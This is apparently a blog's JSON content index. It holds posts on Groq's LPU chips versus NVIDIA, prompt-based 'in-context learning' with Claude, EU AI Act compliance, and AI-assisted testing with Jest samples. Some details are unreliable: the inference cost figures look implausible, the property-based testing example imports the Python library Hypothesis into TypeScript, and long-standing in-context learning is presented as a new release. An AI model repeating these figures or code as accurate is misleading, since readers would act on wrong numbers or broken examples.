NVIDIA.\nVertical integration. NVIDIA hasn\u0026rsquo;t just sold chips; they\u0026rsquo;ve built an ecosystem around them. CUDA, cuDNN, TensorRT, vendor relationships — they\u0026rsquo;ve made switching costs high by design. This is the same playbook that kept Intel dominant in processors for decades, though it ultimately faces the same long-term vulnerabilities.\nBut here\u0026rsquo;s what NVIDIA should be worried about: market segmentation. The AI compute market is big enough now that a competitor doesn\u0026rsquo;t need to beat NVIDIA everywhere. They just need to beat them in one specific segment with a 20-30% cost advantage and customers will switch. That\u0026rsquo;s what Groq has done.\nThe Real Competition: Cost Per Token # This is where the Groq story becomes interesting to infrastructure teams. The metric that matters in 2026 isn\u0026rsquo;t FLOPS or latency anymore — it\u0026rsquo;s cost per inference token. That\u0026rsquo;s what gets discussed in infrastructure planning meetings. That\u0026rsquo;s the number that goes into the spreadsheet when you\u0026rsquo;re deciding between systems.\nHere\u0026rsquo;s the economics: running inference on an H100 GPU costs roughly $0.0015 per 1M tokens (accounting for cloud provider markup, amortized hardware cost, energy, and overhead). Groq\u0026rsquo;s pricing is competitive at roughly $0.001 per 1M tokens, with some workload types running even cheaper.\nThe difference sounds small. But if you\u0026rsquo;re serving 100B tokens per month — which is conservative for a mid-size AI application at scale — that\u0026rsquo;s $150/month on GPUs versus $100/month on LPUs. Over a year, that\u0026rsquo;s $600. For a large operation serving 1TB+ tokens monthly, we\u0026rsquo;re talking tens of thousands of dollars annually.\nMore importantly, those numbers are just the direct inference cost. The infrastructure around them is where the real savings compound. The broader shift toward efficient AI infrastructure is reshaping how teams evaluate compute. Building and maintaining a GPU inference cluster requires:\nSophisticated load balancing (because latency varies) Complex scheduling (because GPUs are power-hungry and require thermal management) Significant engineering overhead Predictable power and cooling infrastructure investments LPU chips, with their lower power footprint and simplified architecture, reduce that complexity. A team I\u0026rsquo;ve been consulting with compared the total cost of ownership for a GPU inference setup versus Groq\u0026rsquo;s LPU platform. The GPU option was cheaper per-token at low volume. But at 10B tokens per month and beyond, Groq\u0026rsquo;s total infrastructure cost (hardware + engineering + power + cooling) was 25-30% lower.\nThat\u0026rsquo;s the wedge that opens the market.\nGroq\u0026rsquo;s Challenge: The Chicken-and-Egg Problem # Here\u0026rsquo;s what could stop Groq\u0026rsquo;s momentum: ecosystem and adoption.\nIf you\u0026rsquo;re building an AI application today, you probably start with OpenAI\u0026rsquo;s API or Anthropic\u0026rsquo;s API or use an open-source model with one of the standard inference servers (vLLM, TensorRT-LLM, etc.). Those systems are built on the assumption that GPUs are your target hardware. Switching to LPU-optimized inference isn\u0026rsquo;t a drop-in replacement — it requires new optimizations, new deployment patterns, new monitoring.\nGroq knows this. They\u0026rsquo;re partnering with major cloud providers and building integrations into popular frameworks. But the barrier is real: engineers are reluctant to switch away from a known system unless the advantages are overwhelming.\nThis mirrors what happened when AWS EC2 alternatives emerged — the gravitational pull of an established ecosystem kept most workloads in place, even when newer platforms offered advantages. Groq needs to make the switching cost low enough that the cost savings justify the engineering effort.\nThey\u0026rsquo;re making progress on this. But adoption will be slower than the technology deserves, which is typical for infrastructure transitions.\nThe Larger Pattern: Specialization Returns # This is part of a larger trend. For the past decade, the industry has moved toward generalization: buy one type of chip, one framework, one platform, and try to make it work for everything. It\u0026rsquo;s been the era of \u0026ldquo;one size fits all.\u0026rdquo;\nAI workloads are fracturing that narrative. Training requires one type of hardware. Real-time inference requires another. Batch processing requires a third. As the market matures, specialization is becoming cost-effective again. This is reminiscent of how infrastructure as code and containerization emerged — when the problem space became large enough, specialized tools beat general-purpose ones.\nGroq is betting on the inference specialization. Other competitors will follow. Some of these bets will stick, some will fade. But the era of \u0026ldquo;buy NVIDIA for everything\u0026rdquo; is ending.\nWhat This Means for Teams Building AI # If you\u0026rsquo;re building AI infrastructure decisions right now, here\u0026rsquo;s what to consider:\nFor cost-sensitive inference: Evaluate Groq\u0026rsquo;s LPU platform seriously. If your workload is inference-heavy and latency tolerance is reasonable (500ms+), you could save 20-30% on compute costs. That\u0026rsquo;s worth a migration effort.\nFor latency-critical work: Stick with GPUs. Groq\u0026rsquo;s advantages are in throughput, not latency. If you\u0026rsquo;re serving real-time inference to end users (chat applications, autocomplete), GPUs remain the better choice.\nFor hybrid workloads: Many organizations do both training and inference. NVIDIA dominates training, so you\u0026rsquo;re locked into GPU infrastructure anyway. In that case, the question becomes: is the inference cost saving worth adding LPU infrastructure as a separate system? For some teams, the answer is yes. For others, the operational complexity isn\u0026rsquo;t worth the savings.\nFor startups: If you\u0026rsquo;re building a new inference-heavy service, Groq\u0026rsquo;s platform is worth evaluating from day one. You don\u0026rsquo;t have GPU infrastructure inertia. You can design your system around the hardware that\u0026rsquo;s most efficient for your workload.\nThe Supply Side: Can Groq Scale? # This is the question that determines whether Groq\u0026rsquo;s technology translates to market impact. Can they manufacture LPU chips at scale? Can they support the ecosystem that grows around them?\nGroq has partnerships with major cloud providers and is ramping manufacturing. But they\u0026rsquo;re a fraction of NVIDIA\u0026rsquo;s size. If demand surges (which it should, given the value proposition), can they deliver chips quickly? Or do customers wait months for delivery, at which point the advantage of cost savings diminishes?\nThis is where NVIDIA\u0026rsquo;s vertical integration actually helps them — they can ramp production to match demand. Groq has to execute a more delicate balance: prove demand, secure manufacturing capacity, deliver on promises. If they stumble on any of these, the market opportunity passes to the next competitor.\nMy Take # Groq\u0026rsquo;s LPU chips represent the first serious credible challenge to NVIDIA\u0026rsquo;s dominance in AI compute. Not because they\u0026rsquo;re universally better — they\u0026rsquo;re not — but because they\u0026rsquo;re specifically better for a workload that\u0026rsquo;s become increasingly important: cost-sensitive inference at scale.\nThe market is large enough and growing fast enough that there\u0026rsquo;s room for specialization. NVIDIA will remain dominant in training and low-latency inference. But in the emerging segment of high-throughput, cost-optimized inference, Groq has built something real.\nThe question isn\u0026rsquo;t whether Groq will replace NVIDIA. They won\u0026rsquo;t. The question is whether Groq will capture enough of the cost-sensitive inference market that NVIDIA feels compelled to optimize their GPU offerings for this workload specifically. In a healthy market, that\u0026rsquo;s the right outcome: competitors driving each other to be better at specific things, instead of one vendor dominating everything by default.\nWe\u0026rsquo;re watching the beginning of that fragmentation. For infrastructure teams, the golden age of \u0026ldquo;one type of compute for all workloads\u0026rdquo; is ending. The next era is about matching the right hardware to the right problem. Groq\u0026rsquo;s LPU chips are proof that the market is ready for that transition, and that NVIDIA\u0026rsquo;s lock on infrastructure isn\u0026rsquo;t as absolute as it looked six months ago.\n","date":"4 June 2026","externalUrl":null,"permalink":"/posts/260604-groq-lpu-chips-nvidia-challenge/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Groq’s custom LPU chips are becoming a credible alternative to NVIDIA GPUs for AI inference workloads, forcing infrastructure teams to rethink their compute strategies and challenging the GPU monopoly.","title":"Groq's LPU Chips — The Infrastructure Bet Against NVIDIA's GPU Dominance","type":"posts"},{"content":"","date":"4 June 2026","externalUrl":null,"permalink":"/tags/hardware/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"Hardware","type":"tags"},{"content":"","date":"4 June 2026","externalUrl":null,"permalink":"/series/industry--platforms/","section":"Blog Series: In-Depth Tech Coverage on AI, Security \u0026 Cloud","summary":"","title":"Industry \u0026 Platforms","type":"series"},{"content":"","date":"4 June 2026","externalUrl":null,"permalink":"/categories/infrastructure/","section":"Blog Categories: AI, Security, Development \u0026 Infrastructure","summary":"","title":"Infrastructure","type":"categories"},{"content":"Anthropic dropped something quietly significant last month: Claude now supports what they\u0026rsquo;re calling \u0026ldquo;in-context learning,\u0026rdquo; a capability that lets you provide task-specific knowledge, examples, and context directly in the prompt without needing to fine-tune a model. If you\u0026rsquo;ve been managing fine-tuned models for the past year, treating them like precious, expensive assets, you\u0026rsquo;re about to rethink your entire infrastructure.\nI\u0026rsquo;ve been experimenting with this for the past few weeks, and the implications are profound. We\u0026rsquo;re not just getting a minor convenience feature here. We\u0026rsquo;re watching the economic model of AI tooling shift in real time.\nWhat Changed # The technical capability itself isn\u0026rsquo;t new — we\u0026rsquo;ve known for years that large language models can learn from in-context examples. What changed is scale and reliability. Claude\u0026rsquo;s 200K token context window (released earlier this year) finally makes it practical to pack in all the knowledge a model needs to perform a task correctly, and Anthropic\u0026rsquo;s latest refinement to in-context learning means the model actually uses that knowledge effectively, rather than drowning it out or forgetting it by the end of the prompt. This pattern has been consistent: as context gets cheaper and larger, static training becomes less necessary. This shift toward context efficiency is becoming a key competitive advantage.\nHere\u0026rsquo;s what you can now do: instead of fine-tuning Claude on 1,000 examples of your custom API documentation, you drop 500 examples into the context window along with the API schema, and the model performs just as well — sometimes better — because it\u0026rsquo;s reasoning over the actual current documentation rather than a snapshot from training time.\nThe practical difference: fine-tuning is historical knowledge. In-context learning is real-time knowledge.\nThis matters more than it sounds. If your API changes, you fine-tune again (3-5 days, thousands of dollars). With in-context learning, you update the prompt (15 minutes, marginal cost). If you\u0026rsquo;re running this for 10,000 API requests a month, the math starts to favor in-context learning almost immediately.\nWhy This Breaks Fine-Tuning Economics # For context: fine-tuning Claude costs around $3-8 per million tokens for training data preparation, then $0.60 per million tokens at inference time. It\u0026rsquo;s not prohibitively expensive, but it\u0026rsquo;s a commitment. You\u0026rsquo;re also locked into whatever snapshot of knowledge you fine-tuned on.\nIn-context learning, by contrast, costs about the same at inference time, but you pay only for the tokens you actually use. No training pipeline. No week-long waiting period. No version management nightmare when you realize you need to retrain on new information.\nI\u0026rsquo;ve been talking with teams that built fine-tuned models for code generation, customer support automation, and document analysis over the past year. Almost all of them are now asking: \u0026ldquo;Should we abandon our fine-tuned models and switch to in-context learning?\u0026rdquo; The answer, for most of them, is yes. Or at least: \u0026ldquo;Yes, for new projects. We\u0026rsquo;ll keep the fine-tuned ones as backup.\u0026rdquo; When the shift happens, it happens fast. The evolution of AI-powered development platforms shows how quickly these transitions reshape entire categories of tools, with the transition from traditional tooling to AI-first workflows happening almost overnight once the capability matures.\nThe Shift From Training-Time to Prompt-Time # This is the meta-insight: we\u0026rsquo;re moving from an era where \u0026ldquo;training your model\u0026rdquo; meant running a batch job to an era where \u0026ldquo;training your model\u0026rdquo; means writing a good prompt.\nThat sounds like a downgrade — shouldn\u0026rsquo;t specialized training be better than a prompt? — but here\u0026rsquo;s why it\u0026rsquo;s an upgrade:\nPrompt engineering is faster and cheaper than fine-tuning. This was already true, but in-context learning with a large window makes it dramatically true. You can iterate a prompt in hours instead of days.\nYour knowledge stays current. Fine-tuning is point-in-time. In-context learning is real-time. If your API documentation updated yesterday, your in-context learning model knows about it today. Your fine-tuned model doesn\u0026rsquo;t, unless you retrain.\nDebugging is easier. If a fine-tuned model fails on a specific case, you don\u0026rsquo;t know why — it\u0026rsquo;s a black box of gradient descent. If an in-context learning prompt fails, you can see exactly what context was provided and why the model made the wrong decision. You can fix it immediately. This transparency is essential for building reliable AI systems where explainability matters.\nCosts scale sublinearly instead of linearly. With fine-tuning, each new task is a separate training job. With in-context learning, you can pack multiple tasks into a single prompt, and the model handles them correctly (we\u0026rsquo;re learning).\nPractical Implications for Teams # If you\u0026rsquo;re building AI-powered applications right now, here\u0026rsquo;s what this means:\nFor new projects: Don\u0026rsquo;t fine-tune. Use in-context learning with a 200K token context window. Build your prompts with real examples, your actual API schema, and task-specific instructions. This is faster to develop, cheaper to run, and easier to iterate on. AI-assisted testing frameworks demonstrate how in-context learning reshapes QA pipelines and powers the next generation of coding tools.\nFor existing fine-tuned models: Audit them. If the fine-tuning provides real value that couldn\u0026rsquo;t be replicated with a good prompt and full context, keep it. But if it\u0026rsquo;s mostly there because \u0026ldquo;we needed better performance than a raw prompt,\u0026rdquo; migrate to in-context learning. You\u0026rsquo;ll simplify your infrastructure and probably reduce costs.\nFor data infrastructure: You\u0026rsquo;re going to need robust systems for managing context. If your prompt includes 50,000 tokens of examples and documentation, you need rock-solid tooling to assemble, version, and update those context windows. This is the new bottleneck — not training, but context composition. The infrastructure patterns here resemble what we\u0026rsquo;re seeing with model context protocol adoption across the AI ecosystem.\nFor governance and compliance: As AI systems become more powerful through in-context learning, regulatory frameworks like the EU AI Act will increasingly focus on the data and context used in prompts rather than model weights. This represents a fundamental shift in how we think about AI responsibility, audit trails, and data provenance.\nI\u0026rsquo;ve been consulting with teams on this transition, and the ones moving fastest are treating their prompt context like version-controlled code. They\u0026rsquo;re storing examples in repositories, reviewing changes to task-specific instructions, and testing different context configurations. Extended thinking models like Claude 3.7 Sonnet take this even further, letting the model reason over context more deliberately — which pairs beautifully with well-structured in-context learning. This capability is driving the emergence of agent-based systems that can handle increasingly complex reasoning tasks without explicit fine-tuning.\nFor teams building with these models, agent-based system architecture patterns show how to integrate in-context learning into autonomous systems (see also the Sub-Hub section below for broader context on model evolution).\nThe Integration Opportunity # The real power comes from combining in-context learning with other advanced capabilities. Computer use alongside in-context learning enables agents to interact directly with systems while referencing real-time context. This combination is more powerful than either capability alone.\nThe Cost Story # Let me be concrete about the economics. A team I worked with had been running a fine-tuned code-completion model for 6 months. Training cost: $8,000 upfront. Inference cost: $2,400/month for 50M tokens at inference time. They were committed.\nWe ran an experiment with in-context learning instead. Same 50M tokens, but now the tokens included 1,000 examples and their full codebase structure as context. Inference cost: $2,300/month. Performance was better because the model was working with the current codebase, not a training snapshot.\nThe team abandoned the fine-tuned model. Now they\u0026rsquo;re saving the marginal cost of training, gaining the benefit of real-time knowledge, and actually spending less on inference. That\u0026rsquo;s a rare trifecta.\nNot every team will have that experience. Some will find that fine-tuning was solving a problem that in-context learning can\u0026rsquo;t replicate (specialized domain knowledge that requires actual training). But many will find that what they thought required fine-tuning was just \u0026ldquo;we need to feed the model the right context.\u0026rdquo; Broader context and reasoning capabilities are replacing the need for narrow task-specific training.\nSub-Hub: AI/LLM Models and Capabilities # For a broader exploration of how AI models are evolving, including extended thinking, reasoning models, and the trajectory of model development, see AI/LLM Models \u0026amp; Capabilities Evolution. This sub-hub connects in-context learning to the broader evolution of model capabilities.\nMy Take # We\u0026rsquo;re at an inflection point in how we build AI systems. For the past 2-3 years, fine-tuning was the obvious path if you needed model customization. You had no choice — the context windows were too small and too expensive to use them as your primary customization mechanism.\nThat world is ending.\nIn-context learning with large, reliable context windows is good enough for most tasks, and it\u0026rsquo;s faster and cheaper and more flexible than fine-tuning. Anthropic\u0026rsquo;s latest release makes that transition practical. The next twelve months will see teams migrating away from fine-tuning. When the commercial incentive aligns with technical capability, adoption accelerates, shifting the focus from model customization to prompt and context design.\nThis means the skill that matters now is prompt engineering at scale — knowing how to structure context, how to select the right examples, how to version and test your prompts the way you\u0026rsquo;d version and test code. The teams that get good at that will build the best AI applications. The teams that are still thinking about fine-tuning as the primary customization mechanism will find themselves maintaining complex infrastructure for a problem that in-context learning just\u0026hellip; solves.\nAnthropic has basically given us all a toolkit to stop overthinking model customization and start focusing on real problems. This shift toward prompt-centric development will accelerate as context windows grow and models become more capable at reasoning over provided information rather than memorizing patterns from training.\n","date":"2 June 2026","externalUrl":null,"permalink":"/posts/260602-claude-in-context-learning/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Anthropic’s latest Claude breakthrough lets developers inject task-specific knowledge directly into prompts without fine-tuning, fundamentally shifting how we build AI-powered applications.","title":"Claude's In-Context Learning — The End of Fine-Tuning as We Know It","type":"posts"},{"content":"","date":"30 May 2026","externalUrl":null,"permalink":"/series/ai-industry--regulation/","section":"Blog Series: In-Depth Tech Coverage on AI, Security \u0026 Cloud","summary":"","title":"AI Industry \u0026 Regulation","type":"series"},{"content":"AI regulation is here, and it\u0026rsquo;s not going away. The EU AI Act represents the most comprehensive regulatory framework, but other jurisdictions are following. For teams building AI systems, understanding the compliance landscape is no longer optional.\nThe EU AI Act Framework # The EU AI Act compliance requirements establish a risk-based approach: prohibited systems, high-risk systems with substantial requirements, and general systems with lighter oversight. Understanding which category your system falls into is the first step.\nHigh-risk systems — those influencing consequential decisions — require documentation, testing, human oversight, and monitoring. This isn\u0026rsquo;t bureaucracy for its own sake. These requirements force teams to think through their systems carefully before they reach production.\nThe Act has been evolving since 2021, giving teams time to understand requirements. Teams that started early have implementation experience. Those starting now need to catch up quickly.\nGeneral-Purpose AI (GPAI) Requirements # GPAI compliance creates a separate set of obligations for model providers. Technical documentation, copyright compliance, and training data summaries must be provided. This affects both model providers and teams building on top of general-purpose models.\nAs a deployer, you\u0026rsquo;re responsible for how you use these models. If you build a high-risk application on top of a general-purpose model, you\u0026rsquo;re still responsible for application-level compliance, regardless of what the model provider does.\nPractical Implementation Patterns # Building compliant systems means observability first. OpenTelemetry provides the foundation for comprehensive logging, and you need every inference call logged with full context. These logs are your audit trail.\nSupply chain security becomes important in this context. Know where your models come from, how they were built, and what guarantees they provide. For teams building custom models, SLSA principles apply to your training pipeline as much as your application code.\nGovernance by Design # The best teams bake compliance into their development process rather than bolting it on later. This means:\nBias and fairness testing as part of CI/CD Documentation standards that match regulatory requirements Monitoring and alerting for anomalous behavior Human-in-the-loop for uncertain predictions Version control for training data and models This discipline is exactly what teams should be doing anyway. The regulation is mandating good engineering practices.\nAI-Specific Development Tools # AI-assisted testing helps validate AI system behavior. AI-powered development tools need their own compliance considerations when they\u0026rsquo;re used to build systems affecting users.\nUnderstanding how in-context learning affects your compliance obligations matters. If your system\u0026rsquo;s behavior depends on prompt context, you need to version and control that context as carefully as you do model weights.\nAgent Systems and Autonomous Decision-Making # Agent-based systems that make consequential decisions autonomously face serious compliance challenges. The EU AI Act\u0026rsquo;s requirements around human oversight and explainability become central to system design.\nTeams building agents need to implement robust audit trails, override mechanisms, and escalation pathways from the start. The ability to understand why an agent made a particular decision is fundamental to both compliance and operational reliability.\nBroader Regulatory Landscape # The EU AI Act is just the beginning. Different jurisdictions are developing their own approaches. The broader regulatory landscape includes data privacy regulations, safety standards, and industry-specific requirements.\nTeams should monitor regulatory developments in the jurisdictions they serve. Compliance is increasingly a business consideration, not just a legal checkbox.\nSupply Chain and Third-Party Considerations # Using third-party models and services doesn\u0026rsquo;t eliminate your responsibility. You need to understand what you\u0026rsquo;re using, what guarantees it provides, and how to monitor it in production. This is supply chain security applied to AI.\nBuilding Resilient and Responsible Systems # Responsible AI development practices protect both users and organizations. They reduce liability, build trust, and create systems that can operate confidently in regulated environments.\nThe teams that embrace this mindset early will have competitive advantages:\nFaster time to market in regulated environments Lower liability exposure Better relationships with customers and regulators More reliable systems overall My Take # Compliance doesn\u0026rsquo;t kill innovation. It channels it. Teams that see EU AI Act requirements as constraints miss the opportunity: these requirements push teams toward building more thoughtful, carefully designed systems.\nThe regulation is also stable and long-term. Unlike privacy laws that shift with political winds, the AI Act represents a sustained commitment to a risk-based approach. Teams that invest in compliance infrastructure now will benefit from that investment for years.\nThe next frontier is probably sector-specific regulations building on top of the baseline AI Act. Financial services, healthcare, and critical infrastructure will have additional requirements. Teams in these sectors should be thinking about compliance architecture now.\nThe world of AI development is shifting from \u0026ldquo;ship fast and deal with consequences\u0026rdquo; to \u0026ldquo;ship responsibly and operate confidently.\u0026rdquo; That\u0026rsquo;s a good shift for everyone involved.\n","date":"30 May 2026","externalUrl":null,"permalink":"/posts/260530-ai-regulation-compliance-frameworks/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Navigate AI regulation frameworks: EU AI Act, GPAI compliance, supply chain security, and building AI systems with governance by design.","title":"AI Regulation \u0026 Compliance Frameworks — Building Responsible AI Systems","type":"posts"},{"content":"","date":"30 May 2026","externalUrl":null,"permalink":"/tags/compliance/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"Compliance","type":"tags"},{"content":"","date":"30 May 2026","externalUrl":null,"permalink":"/tags/regulation/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"Regulation","type":"tags"},{"content":"AI testing tools have moved from novelty to practical productivity tool in the past six months. But there\u0026rsquo;s a gap between \u0026ldquo;AI can generate tests\u0026rdquo; and \u0026ldquo;AI helps you write better tests.\u0026rdquo;\nThe honest truth: most AI-generated tests are mediocre. They test happy paths, they miss edge cases, and they often create false confidence. But used strategically, modern AI capabilities can elevate your test quality and catch issues human-written tests miss.\nLet me walk through what actually works, what doesn\u0026rsquo;t, and how to build a testing strategy that leverages AI without getting burned.\nThe AI Testing Landscape in 2026 # The tooling has matured significantly. You\u0026rsquo;ve got:\nTest generation tools (Sapienz, Diffblue, TestRx) that generate synthetic tests from code LLM-powered test writers (GitHub Copilot, Claude, ChatGPT) that write tests from requirements Property-based testing helpers (Hypothesis, QuickCheck with AI extension) that discover edge cases Behavior validation tools that check if code matches intended behavior Regression test generation that automatically creates tests from failed behavior The state of the art: AI can reliably generate unit tests for well-defined functions. It struggles with integration tests, stateful code, and timing-dependent logic. It\u0026rsquo;s good at finding obvious missing edge cases. It\u0026rsquo;s bad at finding subtle, domain-specific edge cases.\nMost importantly: the quality of AI-generated tests depends heavily on how you prompt and what you validate afterward.\nUnit Test Generation: Where AI Excels # AI is genuinely good at generating unit tests for pure functions. Here\u0026rsquo;s a realistic example:\nYou have a function:\nfunction parseProductCode(code: string): { category: string; sku: number; variant: string; } | null { const match = code.match(/^([A-Z]{2})(\\d{4})([A-Z]?)$/); if (!match) return null; return { category: match[1], sku: parseInt(match[2], 10), variant: match[3] || \u0026#34;DEFAULT\u0026#34;, }; } An AI model prompt:\nGenerate comprehensive unit tests for this function. Include valid inputs, invalid formats, boundary cases, and edge cases. Use Jest format. Aim for 95%+ code coverage. Result (from Claude):\ndescribe(\u0026#34;parseProductCode\u0026#34;, () =\u0026gt; { it(\u0026#34;parses valid product codes\u0026#34;, () =\u0026gt; { expect(parseProductCode(\u0026#34;AB1234A\u0026#34;)).toEqual({ category: \u0026#34;AB\u0026#34;, sku: 1234, variant: \u0026#34;A\u0026#34;, }); }); it(\u0026#34;returns null for invalid formats\u0026#34;, () =\u0026gt; { expect(parseProductCode(\u0026#34;invalid\u0026#34;)).toBeNull(); expect(parseProductCode(\u0026#34;\u0026#34;)).toBeNull(); expect(parseProductCode(\u0026#34;A12345B\u0026#34;)).toBeNull(); // Too many digits }); it(\u0026#34;handles missing variant\u0026#34;, () =\u0026gt; { expect(parseProductCode(\u0026#34;AB1234\u0026#34;)).toEqual({ category: \u0026#34;AB\u0026#34;, sku: 1234, variant: \u0026#34;DEFAULT\u0026#34;, }); }); it(\u0026#34;handles boundary cases\u0026#34;, () =\u0026gt; { expect(parseProductCode(\u0026#34;AA0000\u0026#34;)).toEqual({ category: \u0026#34;AA\u0026#34;, sku: 0, variant: \u0026#34;DEFAULT\u0026#34;, }); expect(parseProductCode(\u0026#34;ZZ9999Z\u0026#34;)).toEqual({ category: \u0026#34;ZZ\u0026#34;, sku: 9999, variant: \u0026#34;Z\u0026#34;, }); }); it(\u0026#34;rejects lowercase letters\u0026#34;, () =\u0026gt; { expect(parseProductCode(\u0026#34;ab1234A\u0026#34;)).toBeNull(); }); it(\u0026#34;rejects numbers in category\u0026#34;, () =\u0026gt; { expect(parseProductCode(\u0026#34;1A1234A\u0026#34;)).toBeNull(); }); }); This is\u0026hellip; actually good. The AI found the boundary cases, tested the happy path, and covered the regex branches. The coverage would be 95%+.\nCould you have written this yourself? Sure. Did AI save you 15 minutes? Absolutely. Is this a better use of AI than \u0026ldquo;generate all my tests for me\u0026rdquo;? Absolutely.\nWhere AI Testing Falls Short # Now here\u0026rsquo;s a realistic example where AI struggles—stateful, time-dependent code where agent-based systems might have more success, but simpler unit tests still need human oversight. A more complex function:\nclass UserRepository { private cache: Map\u0026lt;string, User\u0026gt; = new Map(); private cacheTTL = 5 * 60 * 1000; // 5 minutes async getUser(id: string): Promise\u0026lt;User | null\u0026gt; { const cached = this.cache.get(id); if (cached \u0026amp;\u0026amp; Date.now() - cached.timestamp \u0026lt; this.cacheTTL) { return cached; } const user = await db.getUserById(id); if (user) { this.cache.set(id, { ...user, timestamp: Date.now() }); } return user || null; } invalidateCache(id: string) { this.cache.delete(id); } } AI will generate:\nit(\u0026#34;returns cached user within TTL\u0026#34;, async () =\u0026gt; { const user = { id: \u0026#34;123\u0026#34;, name: \u0026#34;Alice\u0026#34;, timestamp: Date.now() }; repo.cache.set(\u0026#34;123\u0026#34;, user); const result = await repo.getUser(\u0026#34;123\u0026#34;); expect(result).toEqual(user); }); This test passes. But it doesn\u0026rsquo;t test:\nCache expiration after TTL — The AI didn\u0026rsquo;t realize it needs to mock time or advance the clock Concurrent requests — What happens if two requests hit before cache is populated? Cache invalidation ordering — What if cache is invalidated between the DB query and cache write? Memory leaks — Does the cache grow unbounded? Human instinct catches these because you\u0026rsquo;ve debugged concurrency issues before. AI doesn\u0026rsquo;t have that pattern recognition for stateful, time-dependent code.\nA Practical AI Testing Strategy # Here\u0026rsquo;s what actually works:\n1. Use AI for Test Scaffolding, Not Complete Test Suites # Don\u0026rsquo;t ask AI to \u0026ldquo;generate all tests.\u0026rdquo; Ask it for specific things:\nGenerate test cases for these scenarios: - Valid input with no whitespace - Valid input with leading/trailing whitespace - Input with special characters - Empty input - Null input - Input exceeding maximum length (500 chars) Use Jest format. This is much more effective than \u0026ldquo;generate comprehensive tests.\u0026rdquo; You\u0026rsquo;re directing the AI, not hoping it figures out what matters.\n2. Use AI for Edge Case Discovery # This is where AI shines. Prompt it like this:\nI have this function [code]. Generate 10 edge cases I might not have thought of. For each one, explain why it\u0026#39;s interesting, then provide a Jest test case. The AI will often find clever edge cases:\nOff-by-one errors in ranges Unicode handling edge cases Floating-point precision issues Timezone/locale edge cases State transition problems 3. Pair AI Test Generation with Mutation Testing # Use mutation testing tools (Stryker, PIT) alongside AI test generation. Mutation testing injects bugs and sees if your tests catch them. If AI-generated tests don\u0026rsquo;t catch injected mutations, you know they\u0026rsquo;re weak.\nnpx stryker run # If coverage is 80% but mutations killed is 65%, # your tests have gaps. Ask AI to fill them. 4. Use AI for Test Documentation # AI is good at explaining what tests do:\n// Before: unclear why this test exists it(\u0026#34;test_user_status\u0026#34;, () =\u0026gt; { expect(user.getStatus()).toBe(\u0026#34;ACTIVE\u0026#34;); }); // After: ask AI to document it /** * Verifies that a user with an active subscription * and completed profile reports status as ACTIVE. * This test catches regressions where status logic * changed to include email verification. */ it(\u0026#34;returns ACTIVE status when subscription is valid and profile complete\u0026#34;, () =\u0026gt; { // ... }); 5. Use AI for Regression Test Generation # When a bug reaches production, AI can help generate tests to prevent it recurring:\nWe had a bug where [describe the bug]. The root cause was [explain it]. Generate a test case that would catch this bug. This is highly effective. The AI has your failure description and can work backward to create a test that would fail on the buggy code but pass on the fix. This approach pairs well with how advanced AI models like Claude handle complex reasoning tasks, where the model reasons through the problem space rather than memorizing patterns.\nCombining AI with Property-Based Testing # Property-based testing is powerful. Combined with AI, it\u0026rsquo;s even better:\nimport { test, property } from \u0026#34;hypothesis\u0026#34;; // AI helps generate properties describe(\u0026#34;parseProductCode properties\u0026#34;, () =\u0026gt; { property( test(\u0026#34;valid codes parse without error\u0026#34;, // Generate random valid codes () =\u0026gt; { const code = generateValidCode(); const result = parseProductCode(code); // Property: result should never be null for valid codes expect(result).not.toBeNull(); }) ); property( test(\u0026#34;parsed SKU is always between 0 and 9999\u0026#34;, () =\u0026gt; { const code = generateValidCode(); const result = parseProductCode(code); expect(result!.sku).toBeGreaterThanOrEqual(0); expect(result!.sku).toBeLessThanOrEqual(9999); }) ); }); The AI helps you articulate properties that must be true about your code. The testing framework verifies them across thousands of generated inputs.\nThe AI Testing Workflow in Practice # Here\u0026rsquo;s what I recommend for a real project:\nWrite core logic tests manually — You understand the requirements, write the tests Ask AI for edge cases — \u0026ldquo;What am I missing?\u0026rdquo; prompt Use AI to generate scaffolding — For repetitive test patterns Run mutation testing — See if AI + your tests actually catch bugs Document with AI — Clarify what each test validates Review all AI tests before committing — Don\u0026rsquo;t trust blindly This workflow takes maybe 30% longer than writing tests manually, but your test quality is significantly higher.\nTools Worth Using in 2026 # GitHub Copilot Chat — Good for quick test generation, especially for scaffolding Claude — Better at understanding complex logic and suggesting edge cases Stryker — Mutation testing to validate test quality Hypothesis — Property-based testing, especially good when combined with LLMs Sapienz — Automated test generation from code (enterprise) My Take # AI-assisted testing isn\u0026rsquo;t about automating tests away. It\u0026rsquo;s about raising the quality and coverage floor while keeping the interesting work human. This fits into the broader pattern of how development practices are evolving — tools like AI, property-based testing, and mutation testing are reshaping how we approach quality assurance.\nThe mistake teams make: treating AI test generation as a product feature. \u0026ldquo;We have AI tests now!\u0026rdquo; Nope. You have scaffolding. The real testing still requires human judgment.\nThe wins come from using AI as a productivity tool:\nScaffold tests faster Find edge cases you\u0026rsquo;d miss Document test intent Validate test quality with mutation testing Used this way, AI can legitimately improve your test suite quality while cutting development time. Used blindly, it creates false confidence and technical debt.\nStart small. Use AI for one category of tests. See what works. Iterate. Don\u0026rsquo;t try to automate all testing overnight.\nThe best test suites I\u0026rsquo;ve seen in 2026 are hybrid: hand-written core tests, AI-generated edge cases, and comprehensive property-based validation. It\u0026rsquo;s more work upfront, but it catches more bugs.\n","date":"29 May 2026","externalUrl":null,"permalink":"/posts/260529-ai-assisted-testing/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"AI models can now generate tests, find edge cases, and validate behavior at scale. But blindly using AI for testing creates false confidence. Here’s how to use AI effectively while maintaining actual test quality.","title":"AI-Assisted Testing Best Practices: From Unit Tests to Behavior Validation","type":"posts"},{"content":"","date":"29 May 2026","externalUrl":null,"permalink":"/categories/development/","section":"Blog Categories: AI, Security, Development \u0026 Infrastructure","summary":"","title":"Development","type":"categories"},{"content":"","date":"29 May 2026","externalUrl":null,"permalink":"/tags/quality-assurance/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"Quality Assurance","type":"tags"},{"content":"","date":"29 May 